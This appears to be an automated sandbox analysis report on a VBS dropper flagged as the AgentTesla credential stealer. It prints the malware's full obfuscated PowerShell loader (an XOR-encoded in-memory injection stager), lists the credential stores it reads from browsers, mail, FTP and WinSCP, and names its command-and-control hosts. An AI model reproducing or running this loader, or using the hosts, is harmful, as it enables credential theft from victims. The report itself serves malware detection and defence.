dr'mefsv6afdsncfadsu6sudve1inchj0afcun8da8udbbvcma1bacre9vacor9sa'un;al`$lifodokerhoslikconhuitrnspgdoslarsueejsteutelvetbiagrtreeovransle1wa=ouslummoeurrbrtumekanhyspobmuawirinnansno0br no'udean8kocrucuncdo6trdwo7cuccuafadha6lycdiauncne3krdca1ma8flbimfdi2ddcdycsacgrbse9am6ch9ok7re8grbskfhu0recfibmoddi6nacco4skcun3hicbr0keetrbpocsh4grdre1ancbocyndso3micaf0saeun8sacto0tidco1scczodnocflamecut1kodse6bo'sq;gr`$fifdoostrnoskokidncoiblnskgjossprdaetssteuunlsttsvaprthoechrhysdi2ny=posummpeeknrqutclehonidsfobfoaprrunnkospo0ra ve'trepa2imcre0spdpr1vafca5tedpa7lycbrahecsi6dieir4vacfr1dacva1upddu7tecgy0hodre6uddsu6de'me;ud`$grfteolerluscukclnraisanhagciscyrbeedesvausylfotskaantmuesarudset3la=rasstmekeskrsathuesuntrsinbbeaherronfosku0he co'frfre6sldmecfodin6bedop1tocbu0cocul8gu8mebunfco7opdmo0macwebjadvi1plcjocarcsh8bacst0nu8cobmeerecdicfebtadly1socom0eudaf7recsuatoddh5brfva6pscin0feddi7madba3kacchcrecme6flcde0uidhu6re8rebgeesedbacsp4klcstbrycca1skcfr9dacke0esfmi7uncdu0prcas3hf'gr;de`$pofchomirpesdikflninibanovgsasmarkaegrsbeuvalfotfratrthiealrstskl4da=fosnomfjegorsvtgrebunkaslgbsparorunnsosin0al gr'jodad6endse1pedch7dicprcamcsybfrcpi2mu'ra;we`$irfbrolursuscoktonfeiannnogtasmirpieliscautalextkaasptdoeunrsisir5do=ocsmimbaestrretltesonfusudbgramurfonmosdr0m
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3cc
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$vildmnd = """saflauconfacgatunistounnli sussemleeaurgltinefrnansfrbanacarirnprsre0st to{ch ir al ud dopcoaserusapeman(th[fosrethorkoibonsagsu]in`$norafenogunihyoopnmeshapfrlinathnstlvaoisvunsel)bo;hu in po fe fo`$didocewilmuiunnphtbaeherjuvsyanalprlgaetorkonifecosdi no=br whnbeetrwko-fjokobthjraeleccotun bebstyentcieko[cu]hu cr(hy`$mrrdreoagviimyobantvskvpeklovaacnfrlslohovsospi.sulabenenwagsmthuhth no/be ze2co)st;pe sk gt mi sufudomerom(cr`$arkublvaiovssetunremiaznteggeeunrgu=al0re;un tr`$spktjldrimesaktsurfoiunncagmeesaric he-falbrtka ac`$tirwieudgudideoranobsskprelmiaprnanlreoalvinsfo.boltrefanprgfrtsthdd;uu sp`$sykfolgoialsextinrtrilinungskeicrre+fl=zi2he)le{ga ys un pa pr te ta il af`$trdbrenolfoisenfotcaebrrduvpeaarlmulinetrrfonshehyssa[re`$rekomlpaidastrtburoritenvegdoedirop/sw2be]em gk=lo co[poconosuntivunemarkrtta]vi:tr:witreorobvgyettwaede(ma`$grrwhefogtuianononbysdiploldeafonprludofovgrsun.pasfoucobdusbrtforclimentugli(ja`$cekmeliciaysaftmirgricinuvgunestrse,fu te2ho)ko,sk ba1ti6va)fl;ga va ar`$undscekelpiirenfltpeedortevstacolfjltreperacnovedisla[ca`$afktalidiklscotskrhyiunnbrgsueasrte/mo2pe]le zo=mi ne(ne`$pidsleaulsuifanmytfjeanrfevteaprlnolkrelurfrnbyethsob[ek`$bakudltriorslatserosichnjegskethrsp/er2mu]bi be-prbmeximoforgr es1sk6st5fr)de;ar kn gi an ma}he vn[resgatakrhaisinlogox]fi[tasmoycoshatpaechmor.untaleabxovtfo.exekvnnocaaomedstihonasgbo]no:bi:tiadisbecgrilaihu.ragcoevitkosvatprrunilansugha(ec`$madexekvlfaiflnbateneporssvfuajalinlinegorexnbiewhsan)eq;pa}st`$rifupokorsksinkminveifandugmesrerliebrsovurelhotidaurtdiektrdesfa0in=sishimufecergotafeprnknsvibheahyreknmissi0fi dr'mefsv6afdsncfadsu6sudve1inchj0afcun8da8udbbvcma1bacre9vacor9sa'un;al`$lifodokerhoslikconhuitrnspgdoslarsueejsteutelvetbiagrtreeovransle1wa=ouslummoeurrbrtumekanhyspobmuawirinnansno0br no'udean8kocrucuncdo6trdwo7cuccuafadha6lycdiauncne3krdca1ma8flbimfdi2ddcdycsacgrbse9am6ch9ok7re8grbskfhu0recfibmoddi6nacco4skcun3hicbr0keetrbpocsh4grdre1ancbocyndso3micaf0saeun8sacto0tidco1scczodnocflamecut1kodse6bo'sq;gr`$fifdoostrnoskokidncoiblnskgjossprdaetssteuunlsttsvaprthoechrhysdi2ny=posummpeeknrqutclehonidsfobfoaprrunnkospo0ra ve'trepa2imcre0spdpr1vafca5tedpa7lycbrahecsi6dieir4vacfr1dacva1upddu7tecgy0hodre6uddsu6de'me;ud`$grfteolerluscukclnraisanhagciscyrbeedesvausylfotskaantmuesarudset3la=rasstmekeskrsathuesuntrsinbbeaherronfosku0he co'frfre6sldmecfodin6bedop1tocbu0cocul8gu8mebunfco7opdmo0macwebjadvi1plcjocarcsh8bacst0nu8cobmeerecdicfebtadly1socom0eudaf7recsuatoddh5brfva6pscin0feddi7madba3kacchcrecme6flcde0uidhu6re8rebgeesedbacsp4klcstbrycca1skcfr9dacke0esfmi7uncdu0prcas3hf'gr;de`$pofchomirpesdikflninibanovgsasmarkaegrsbeuvalfotfratrthiealrstskl4da=fosnomfjegorsvtgrebunkaslgbsparorunnsosin0al gr'jodad6endse1pedch7dicprcamcsybfrcpi2mu'ra;we`$irfbrolursuscoktonfeiannnogtasmirpieliscautalextkaasptdoeunrsisir5do=ocsmimbaestrretltesonfusudbgramurfonmosdr0m Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function smertensbarns0 { param([string]$regionsplanlovs); $delintervallernes = new-object byte[] ($regionsplanlovs.length / 2); for($klistringer=0; $klistringer -lt $regionsplanlovs.length; $klistringer+=2){ $delintervallernes[$klistringer/2] = [convert]::tobyte($regionsplanlovs.substring($klistringer, 2), 16); $delintervallernes[$klistringer/2] = ($delintervallernes[$klistringer/2] -bxor 165); } [string][system.text.encoding]::ascii.getstring($delintervallernes);}$forskningsresultaters0=smertensbarns0 'f6dcd6d1c0c88bc1c9c9';$forskningsresultaters1=smertensbarns0 'e8ccc6d7cad6cac3d18bf2cccb96978bf0cbd6c4c3c0ebc4d1ccd3c0e8c0d1cdcac1d6';$forskningsresultaters2=smertensbarns0 'e2c0d1f5d7cac6e4c1c1d7c0d6d6';$forskningsresultaters3=smertensbarns0 'f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3';$forskningsresultaters4=smertensbarns0 'd6d1d7cccbc2';$forskningsresultaters5=smertensbarns0 'e2c0d1e8cac1d0c9c0edc4cbc1c9c0';$forskningsresultaters6=smertensbarns0 'f7f1f6d5c0c6ccc4c9ebc4c8c08985edccc1c0e7dcf6ccc28985f5d0c7c9ccc6';$forskningsresultaters7=smertensbarns0 'f7d0cbd1ccc8c08985e8c4cbc4c2c0c1';$forskningsresultaters8=smertensbarns0 'f7c0c3c9c0c6d1c0c1e1c0c9c0c2c4d1c0';$forskningsresultaters9=smertensbarns0 'eccbe8c0c8cad7dce8cac1d0c9c0';$ghegish0=smertensbarns0 'e8dce1c0c9c0c2c4d1c0f1dcd5c0';$ghegish1=smertensbarns0 'e6c9c4d6d68985f5d0c7c9ccc68985f6c0c4c9c0c18985e4cbd6cce6c9c4d6d68985e4d0d1cae6c9c4d6d6';$ghegish2=smertensbarns0 'eccbd3cacec0';$ghegish3=smertensbarns0 'f5d0c7c9ccc68985edccc1c0e7dcf6ccc28985ebc0d2f6c9cad18985f3ccd7d1d0c4c9';$ghegish4=smertensbarns0 'f3ccd7d1d0c4c9e4c9c9cac6';$ghegish5=smertensbarns0 'cbd1c1c9c9';$ghegish6=smertensbarns0 'ebd1f5d7cad1c0c6d1f3ccd7d1d0c4c9e8c0c8cad7dc';$ghegish7=smertensbarns0 'ece0fd';$ghegish8=smertensbarns0 'f9';function fkp {param ($upgrown, $depressionsperioder) ;$hoeres0 =smertensbarns0 '81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3cc Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0M Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CC Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000007.00000002.6671341455.000000001D701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 392, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 758166 Sample: TT_COPY.vbs Startdate: 01/12/2022 Architecture: WINDOWS Score: 96 23 ftp.mcmprint.net 2->23 25 b3solutionscws.com 2->25 31 Yara detected AgentTesla 2->31 33 Potential malicious VBS script found (suspicious strings) 2->33 35 Potential evasive VBS script found (use of timer() function in loop) 2->35 9 wscript.exe 1 1 2->9         started        signatures3 process4 signatures5 45 Wscript starts Powershell (via cmd or directly) 9->45 47 Obfuscated command line found 9->47 49 Very long command line found 9->49 12 powershell.exe 7 9->12         started        process6 signatures7 51 Very long command line found 12->51 15 powershell.exe 12->15         started        17 conhost.exe 12->17         started        process8 process9 19 CasPol.exe 15 11 15->19         started        dnsIp10 27 b3solutionscws.com 192.185.145.188, 49824, 80 UNIFIEDLAYER-AS-1US United States 19->27 29 ftp.mcmprint.net 185.31.121.136, 21, 49825 RAX-ASBG 